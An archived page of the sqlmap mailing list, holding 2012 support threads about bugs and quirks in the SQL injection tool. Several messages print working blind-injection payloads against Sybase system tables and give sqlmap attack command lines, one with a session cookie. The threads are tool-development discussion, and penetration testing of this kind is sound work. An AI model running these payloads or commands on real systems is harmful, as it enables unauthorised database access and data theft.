sqlmap-users Mailing List for sqlmap (Page 68)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: David A. <dav...@gm...> - 2012-01-30 11:23:07
|
Hi Miroslav, Thank you for your response! "INFERENCE_BLANK_BREAK" was very usefull to reduce the number of requests. great! Now, I report you an unhandled exception found during the test: *[CRITICAL] unhandled exception in sqlmap/1.0-dev (r4692), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.* *sqlmap version: 1.0-dev (r4692)* *Python version: 2.6.6* *Operating system: posix* *Command line: sqlmap.py -u ************************************************************************************************************************************************************************* --data ******************************************************* -p param --cookie=****** --proxy http://127.0.0.1:1234 --safe-freq=1 --safe-url=*************************************** --tables* *Technique: BOOLEAN* *Back-end DBMS: IBM DB2 (fingerprinted)* *Traceback (most recent call last):* * File "/home/user/sqlmap-dev/_sqlmap.py", line 83, in main* * start()* * File "/home/user/sqlmap-dev/lib/controller/controller.py", line 563, in start * * action()* * File "/home/user/sqlmap-dev/lib/controller/action.py", line 91, in action * * conf.dumper.dbTables(conf.dbmsHandler.getTables())* * File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 833, in getTables* * dbs = self.getDbs()* * File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 777, in getDbs* * db = inject.getValue(query, inband=False, error=False)* * File "/home/user/sqlmap-dev/lib/request/inject.py", line 457, in getValue * * value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar, dump)* * File "/home/user/sqlmap-dev/lib/request/inject.py", line 324, in __goInferenceProxy* * outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)* * File "/home/user/sqlmap-dev/lib/request/inject.py", line 103, in __goInferenceFields* * output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)* * File "/home/user/sqlmap-dev/lib/request/inject.py", line 66, in __goInference * * count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)* * File "/home/user/sqlmap-dev/lib/techniques/blind/inference.py", line 497, in bisection* * val = getChar(index, asciiTbl)* * File "/home/user/sqlmap-dev/lib/techniques/blind/inference.py", line 214, in getChar* * unescapedCharValue = unescaper.unescape(markingValue % decodeIntToUnicode(posValue))* *TypeError: %c requires int or char* Kind Regards, David Alvarez On Mon, Jan 30, 2012 at 11:07 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi David. > > Fact is that we rely that DBMS won't return a proper character on a > request for "substring" on non-valid index and that works ok for most of > today's DBMSes. > > But, also we do have a check for these kind of cases. If there is more > than some predefined number of spaces at the end of the retrieved value we > just abruptly abort with that value, trim spaces from the end and continue > on with the next item. > > Thing is that that "breaking" value is currently (r4692) set to 10 and if > you think that's too high for your case you are more than welcome to adjust > it to your needs. Just go to the lib/core/settings.py and change line: > > INFERENCE_BLANK_BREAK = 10 > > to something more appropriate for your needs (e.g. 3) > > Kind regards, > Miroslav Stampar > > On Fri, Jan 27, 2012 at 6:53 PM, David Alvarez <dav...@gm... > > wrote: > >> Hello, >> >> There is a sql injection in an IBM DB2 9.1. I'm using an AND >> boolean-based blind injection. The problem is that sqlmap doesn't check >> properly the end of the string and go in loop getting space chars as result. >> >> I'm using the latest version of sqlmap (r4690). >> >> How could I resolve it? >> >> Regards, >> David Alvarez >> >> >> ------------------------------------------------------------------------------ >> Try before you buy = See our experts in action! >> The most comprehensive online learning library for Microsoft developers >> is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, >> Metro Style Apps, more. Free future releases when you subscribe now! >> http://p.sf.net/sfu/learndevnow-dev2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2012-01-30 10:07:14
|
Hi David. Fact is that we rely that DBMS won't return a proper character on a request for "substring" on non-valid index and that works ok for most of today's DBMSes. But, also we do have a check for these kind of cases. If there is more than some predefined number of spaces at the end of the retrieved value we just abruptly abort with that value, trim spaces from the end and continue on with the next item. Thing is that that "breaking" value is currently (r4692) set to 10 and if you think that's too high for your case you are more than welcome to adjust it to your needs. Just go to the lib/core/settings.py and change line: INFERENCE_BLANK_BREAK = 10 to something more appropriate for your needs (e.g. 3) Kind regards, Miroslav Stampar On Fri, Jan 27, 2012 at 6:53 PM, David Alvarez <dav...@gm...>wrote: > Hello, > > There is a sql injection in an IBM DB2 9.1. I'm using an AND boolean-based > blind injection. The problem is that sqlmap doesn't check properly the end > of the string and go in loop getting space chars as result. > > I'm using the latest version of sqlmap (r4690). > > How could I resolve it? > > Regards, > David Alvarez > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-30 09:03:49
|
Hi Abuse. Thank you for your report and find it fixed with the latest commit (r4691). Kind regards, Miroslav Stampar On Sun, Jan 29, 2012 at 11:16 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > Will check it later today and fix it (as it seems like it needs to be > fixed). > > Kind regards > On Jan 28, 2012 8:32 PM, "Abuse 007" <abu...@gm...> wrote: > >> Hello, >> >> When using sqlmap with the forms option, it does not send the cookies >> or headers specified on the command line. I'd like sqlmap to connect >> to the specified URL using the cookie(s) I specify and then process >> the forms on the response. Is there some way to do this, or does it >> require grabbing the response manually, or code changes to sqlmap? >> >> Here is my sqlmap version: >> >> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap >> Repository Root: https://svn.sqlmap.org/sqlmap >> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb >> Revision: 4687 >> Node Kind: directory >> Schedule: normal >> Last Changed Author: stamparm >> Last Changed Rev: 4687 >> Last Changed Date: 2012-01-16 21:28:21 +1100 (Mon, 16 Jan 2012) >> >> Here is the request with --forms: >> >> # sqlmap.py -u "http://<removed>/<removed>.php" >> --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 --forms >> >> sqlmap/1.0-dev - automatic SQL injection and database takeover tool >> <snip> >> [09:30:50] [DEBUG] cleaning up configuration parameters >> [09:30:50] [DEBUG] setting the HTTP timeout >> [09:30:50] [DEBUG] setting the HTTP Cookie header >> [09:30:50] [DEBUG] setting the HTTP method to GET >> [09:30:50] [DEBUG] setting the HTTP proxy to pass by all HTTP requests >> [09:30:50] [DEBUG] creating HTTP requests opener object >> [09:30:50] [INFO] testing connection to the target url >> [09:30:50] [TRAFFIC OUT] HTTP request [#1]: >> GET /vote.php HTTP/1.1 >> Accept-Encoding: identity >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: s14513-20grcmuy.roma.coliseumlab.net >> Accept-language: en-us,en;q=0.5 >> Pragma: no-cache >> Cache-control: no-cache,no-store >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> Connection: close >> >> >> Here is the request without --forms: >> >> # sqlmap.py -u "http://<removed>/<removed>.php" >> --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 >> >> sqlmap/1.0-dev - automatic SQL injection and database takeover tool >> <snip> >> [09:31:20] [DEBUG] cleaning up configuration parameters >> [09:31:20] [DEBUG] setting the HTTP timeout >> [09:31:20] [DEBUG] setting the HTTP Cookie header >> [09:31:20] [DEBUG] setting the HTTP method to GET >> [09:31:20] [DEBUG] setting the HTTP proxy to pass by all HTTP requests >> [09:31:20] [DEBUG] creating HTTP requests opener object >> [09:31:20] [ERROR] [*] EH: start() >> [09:31:20] [ERROR] [*] EH: conf.url and not any conf.forms... >> [09:31:20] [INFO] using >> '/root/checkout/sqlmap-gitsvn/output/ >> s14513-20grcmuy.roma.coliseumlab.net/session' >> as session file >> [09:31:20] [INFO] testing connection to the target url >> [09:31:20] [TRAFFIC OUT] HTTP request [#1]: >> GET /vote.php HTTP/1.1 >> Accept-Encoding: identity >> Accept-language: en-us,en;q=0.5 >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> User-agent: sqlmap/1.0-dev (http://www.sqlmap.org) >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: s14513-20grcmuy.roma.coliseumlab.net >> Cookie: PHPSESSID=l82mfmirthmukct3kp7sj3gji2; username=MzAx >> Pragma: no-cache >> Cache-control: no-cache,no-store >> Connection: close >> >> Thanks, >> Abu >> >> >> ------------------------------------------------------------------------------ >> Try before you buy = See our experts in action! >> The most comprehensive online learning library for Microsoft developers >> is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, >> Metro Style Apps, more. Free future releases when you subscribe now! >> http://p.sf.net/sfu/learndevnow-dev2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-29 10:16:10
|
Hi. Will check it later today and fix it (as it seems like it needs to be fixed). Kind regards On Jan 28, 2012 8:32 PM, "Abuse 007" <abu...@gm...> wrote: > Hello, > > When using sqlmap with the forms option, it does not send the cookies > or headers specified on the command line. I'd like sqlmap to connect > to the specified URL using the cookie(s) I specify and then process > the forms on the response. Is there some way to do this, or does it > require grabbing the response manually, or code changes to sqlmap? > > Here is my sqlmap version: > > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 4687 > Node Kind: directory > Schedule: normal > Last Changed Author: stamparm > Last Changed Rev: 4687 > Last Changed Date: 2012-01-16 21:28:21 +1100 (Mon, 16 Jan 2012) > > Here is the request with --forms: > > # sqlmap.py -u "http://<removed>/<removed>.php" > --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 --forms > > sqlmap/1.0-dev - automatic SQL injection and database takeover tool > <snip> > [09:30:50] [DEBUG] cleaning up configuration parameters > [09:30:50] [DEBUG] setting the HTTP timeout > [09:30:50] [DEBUG] setting the HTTP Cookie header > [09:30:50] [DEBUG] setting the HTTP method to GET > [09:30:50] [DEBUG] setting the HTTP proxy to pass by all HTTP requests > [09:30:50] [DEBUG] creating HTTP requests opener object > [09:30:50] [INFO] testing connection to the target url > [09:30:50] [TRAFFIC OUT] HTTP request [#1]: > GET /vote.php HTTP/1.1 > Accept-Encoding: identity > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > Host: s14513-20grcmuy.roma.coliseumlab.net > Accept-language: en-us,en;q=0.5 > Pragma: no-cache > Cache-control: no-cache,no-store > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Connection: close > > > Here is the request without --forms: > > # sqlmap.py -u "http://<removed>/<removed>.php" > --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 > > sqlmap/1.0-dev - automatic SQL injection and database takeover tool > <snip> > [09:31:20] [DEBUG] cleaning up configuration parameters > [09:31:20] [DEBUG] setting the HTTP timeout > [09:31:20] [DEBUG] setting the HTTP Cookie header > [09:31:20] [DEBUG] setting the HTTP method to GET > [09:31:20] [DEBUG] setting the HTTP proxy to pass by all HTTP requests > [09:31:20] [DEBUG] creating HTTP requests opener object > [09:31:20] [ERROR] [*] EH: start() > [09:31:20] [ERROR] [*] EH: conf.url and not any conf.forms... > [09:31:20] [INFO] using > '/root/checkout/sqlmap-gitsvn/output/ > s14513-20grcmuy.roma.coliseumlab.net/session' > as session file > [09:31:20] [INFO] testing connection to the target url > [09:31:20] [TRAFFIC OUT] HTTP request [#1]: > GET /vote.php HTTP/1.1 > Accept-Encoding: identity > Accept-language: en-us,en;q=0.5 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > User-agent: sqlmap/1.0-dev (http://www.sqlmap.org) > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > Host: s14513-20grcmuy.roma.coliseumlab.net > Cookie: PHPSESSID=l82mfmirthmukct3kp7sj3gji2; username=MzAx > Pragma: no-cache > Cache-control: no-cache,no-store > Connection: close > > Thanks, > Abu > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-28 09:44:13
|
Svn update. It has been fixed about a week ago. Bernardo Damele A. G. This message was sent from a smartphone On 27 Jan 2012, at 23:55, Iago Sousa <146...@gm...> wrote: > How to type the query if the password contains @ in the value? > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Iago S. <146...@gm...> - 2012-01-27 23:55:19
|
How to type the query if the password contains @ in the value? |
|
From: David A. <dav...@gm...> - 2012-01-27 17:53:31
|
Hello, There is a sql injection in an IBM DB2 9.1. I'm using an AND boolean-based blind injection. The problem is that sqlmap doesn't check properly the end of the string and go in loop getting space chars as result. I'm using the latest version of sqlmap (r4690). How could I resolve it? Regards, David Alvarez |
|
From: Miroslav S. <mir...@gm...> - 2012-01-27 14:58:04
|
Hi Brian. Minor update. As Sybase doesn't support LIMIT/OFFSET like structure (same thing as for MSSQL) we use a method called "pivoting" (one column is used as a "pivot" for retrieving other column values) for deriving row content from tables. Now, problem is that pivoting requires "derived" tables. Sorry, but this moment it has to stay as it is for proper dumping of Sybase tables in general. Kind regards, Miroslav Stampar On Fri, Jan 27, 2012 at 3:44 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Brian. > > Sorry for the late reply. > > You can try it yourself and report back. You can go to the > xml/queries.xml, line 533 and change: > ...count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS > value_table"/> > to: > ...count2="SELECT COUNT(DISTINCT %s) FROM %s"/> > > Please, also try with multiple column names (e.g. --dump for a table with > multiple column names) > > Kind regards, > Miroslav Stampar > > On Wed, Jan 25, 2012 at 1:56 AM, Brian Poole <po...@gm...> wrote: > >> Hello, >> >> Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. >> It seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT >> * FROM (SELECT example from table) as name). sqlmap uses these when >> enumerating the table so it quickly runs into syntax errors. The feature >> announcement for derived tables in 12.5.1 is below: >> >> >> http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25 >> >> I took a quick look and some of the basic queries can be rewritten, e.g.: >> >> AND ASCII(SUBSTRING((SELECT >> ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT >> mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS >> value_table),3,1)) > 1 >> >> to >> >> AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT >> COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1 >> >> However I'm unclear if this would work in all cases (and if so, how it >> could be done cleanly.) Thoughts? >> >> Brian >> >> >> ------------------------------------------------------------------------------ >> Keep Your Developer Skills Current with LearnDevNow! >> The most comprehensive online learning library for Microsoft developers >> is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, >> Metro Style Apps, more. Free future releases when you subscribe now! >> http://p.sf.net/sfu/learndevnow-d2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-27 14:44:54
|
Hi Brian. Sorry for the late reply. You can try it yourself and report back. You can go to the xml/queries.xml, line 533 and change: ...count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/> to: ...count2="SELECT COUNT(DISTINCT %s) FROM %s"/> Please, also try with multiple column names (e.g. --dump for a table with multiple column names) Kind regards, Miroslav Stampar On Wed, Jan 25, 2012 at 1:56 AM, Brian Poole <po...@gm...> wrote: > Hello, > > Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. It > seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT * > FROM (SELECT example from table) as name). sqlmap uses these when > enumerating the table so it quickly runs into syntax errors. The feature > announcement for derived tables in 12.5.1 is below: > > > http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25 > > I took a quick look and some of the basic queries can be rewritten, e.g.: > > AND ASCII(SUBSTRING((SELECT > ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT > mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS > value_table),3,1)) > 1 > > to > > AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT > COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1 > > However I'm unclear if this would work in all cases (and if so, how it > could be done cleanly.) Thoughts? > > Brian > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-27 10:21:11
|
Hi Iago. This is a clearly "only Python 3" version of pymsql you are using. If you go to: https://github.com/petehunt/PyMySQL/blob/master/pymysql/connections.pyyou'll see that there "import ConfigParser" is used which is compatible with required Python v2. This whole mess is a result of "The ConfigParser module has been renamed to configparser in Python 3.0" ( http://docs.python.org/library/configparser.html). Please, go to the: https://github.com/petehunt/PyMySQL/downloads and download there version for Python 2.x. Kind regards, Miroslav Stampar On Fri, Jan 27, 2012 at 3:38 AM, Iago Sousa <146...@gm...> wrote: > sqlmap version: 1.0-dev (r4690) > Python version: 2.6.5 > Operating system: posix > Command line: sqlmap.py -d > ************************************************************** > Technique: None > Back-end DBMS: MySQL (identified) > Traceback (most recent call last): > File "/pentest/database/sqlmap/_sqlmap.py", line 83, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line > 227, in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 32, in > action > setHandler() > File "/pentest/database/sqlmap/lib/controller/handler.py", line 98, > in setHandler > conf.dbmsConnector.connect() > File "/pentest/database/sqlmap/plugins/dbms/mysql/connector.py", line > 39, in connect > self.connector = pymysql.connect(host=self.hostname, > user=self.user, passwd=self.password, db=self.db, port=self.port, > connect_timeout=conf.timeout, use_unicode=True) > File > > "/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/__init__.py", > line 92, in Connect > from .connections import Connection > File > > "/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/connections.py", > line 21, in <module> > import configparser > ImportError: No module named configparser > > [*] shutting down at 23:37:41 > > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Iago S. <146...@gm...> - 2012-01-27 02:46:03
|
sqlmap version: 1.0-dev (r4690)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py -d
**************************************************************
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
File "/pentest/database/sqlmap/_sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line
227, in start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 32, in
action
setHandler()
File "/pentest/database/sqlmap/lib/controller/handler.py", line 98,
in setHandler
conf.dbmsConnector.connect()
File "/pentest/database/sqlmap/plugins/dbms/mysql/connector.py", line
39, in connect
self.connector = pymysql.connect(host=self.hostname,
user=self.user, passwd=self.password, db=self.db, port=self.port,
connect_timeout=conf.timeout, use_unicode=True)
File
"/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/__init__.py",
line 92, in Connect
from .connections import Connection
File
"/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/connections.py",
line 21, in <module>
import configparser
ImportError: No module named configparser
[*] shutting down at 23:37:41
|
|
From: Abuse 0. <abu...@gm...> - 2012-01-26 22:35:48
|
Hello, When using sqlmap with the forms option, it does not send the cookies or headers specified on the command line. I'd like sqlmap to connect to the specified URL using the cookie(s) I specify and then process the forms on the response. Is there some way to do this, or does it require grabbing the response manually, or code changes to sqlmap? Here is my sqlmap version: URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 4687 Node Kind: directory Schedule: normal Last Changed Author: stamparm Last Changed Rev: 4687 Last Changed Date: 2012-01-16 21:28:21 +1100 (Mon, 16 Jan 2012) Here is the request with --forms: # sqlmap.py -u "http://<removed>/<removed>.php" --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 --forms sqlmap/1.0-dev - automatic SQL injection and database takeover tool <snip> [09:30:50] [DEBUG] cleaning up configuration parameters [09:30:50] [DEBUG] setting the HTTP timeout [09:30:50] [DEBUG] setting the HTTP Cookie header [09:30:50] [DEBUG] setting the HTTP method to GET [09:30:50] [DEBUG] setting the HTTP proxy to pass by all HTTP requests [09:30:50] [DEBUG] creating HTTP requests opener object [09:30:50] [INFO] testing connection to the target url [09:30:50] [TRAFFIC OUT] HTTP request [#1]: GET /vote.php HTTP/1.1 Accept-Encoding: identity Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: s14513-20grcmuy.roma.coliseumlab.net Accept-language: en-us,en;q=0.5 Pragma: no-cache Cache-control: no-cache,no-store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Here is the request without --forms: # sqlmap.py -u "http://<removed>/<removed>.php" --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 sqlmap/1.0-dev - automatic SQL injection and database takeover tool <snip> [09:31:20] [DEBUG] cleaning up configuration parameters [09:31:20] [DEBUG] setting the HTTP timeout [09:31:20] [DEBUG] setting the HTTP Cookie header [09:31:20] [DEBUG] setting the HTTP method to GET [09:31:20] [DEBUG] setting the HTTP proxy to pass by all HTTP requests [09:31:20] [DEBUG] creating HTTP requests opener object [09:31:20] [ERROR] [*] EH: start() [09:31:20] [ERROR] [*] EH: conf.url and not any conf.forms... [09:31:20] [INFO] using '/root/checkout/sqlmap-gitsvn/output/s14513-20grcmuy.roma.coliseumlab.net/session' as session file [09:31:20] [INFO] testing connection to the target url [09:31:20] [TRAFFIC OUT] HTTP request [#1]: GET /vote.php HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: s14513-20grcmuy.roma.coliseumlab.net Cookie: PHPSESSID=l82mfmirthmukct3kp7sj3gji2; username=MzAx Pragma: no-cache Cache-control: no-cache,no-store Connection: close Thanks, Abu |
|
From: Brian P. <po...@gm...> - 2012-01-25 00:57:02
|
Hello, Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. It seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT * FROM (SELECT example from table) as name). sqlmap uses these when enumerating the table so it quickly runs into syntax errors. The feature announcement for derived tables in 12.5.1 is below: http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25 I took a quick look and some of the basic queries can be rewritten, e.g.: AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS value_table),3,1)) > 1 to AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1 However I'm unclear if this would work in all cases (and if so, how it could be done cleanly.) Thoughts? Brian |
|
From: Miroslav S. <mir...@gm...> - 2012-01-24 08:48:18
|
Hi Ryan. Only differences between what sqlmap uses and this are: A) they call it bit banging, we call bit inferencing through bisection B) they use boolean AND we use arithmetic greater than Both algorithms have Log2n complexity, so there is no breakthrough here Kind regards, Miroslav Stampar On Jan 23, 2012 8:58 PM, "Ryan Sears" <rd...@mt...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA256 > > Hi all, > > Long time no talk, I just came across this: > http://console-cowboys.blogspot.com/2012/01/bit-banging-your-database.html > > Which looks quite promising, basically it uses the binary representation > and some boolean calculations to determine the length of fields and > other information as opposed to doing it character by character. It > basically narrows everything down to about 8 requests to find the length > of the data. > > I'm not sure if SQLMap uses a technique similar, but it may be worth > looking into, as it could drastically lower the time it takes to mine > out info from time-based blind injection! > > The sample code can be found here: > http://consolecowboys.org/scripts/vm_own.py > > Thanks! > Ryan > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.11 (GNU/Linux) > > iF4EAREIAAYFAk8du7UACgkQt/95fIeU+XaLCAD/VCNgKVG1BqZO97VF+aSKKrQo > kzbcmxJOKTgLJkl6rWMA/jH7Ax5z5zrjvDxJuw6aaJLh6Yubj+2Ee8mzZ9WiFdGC > =6ngJ > -----END PGP 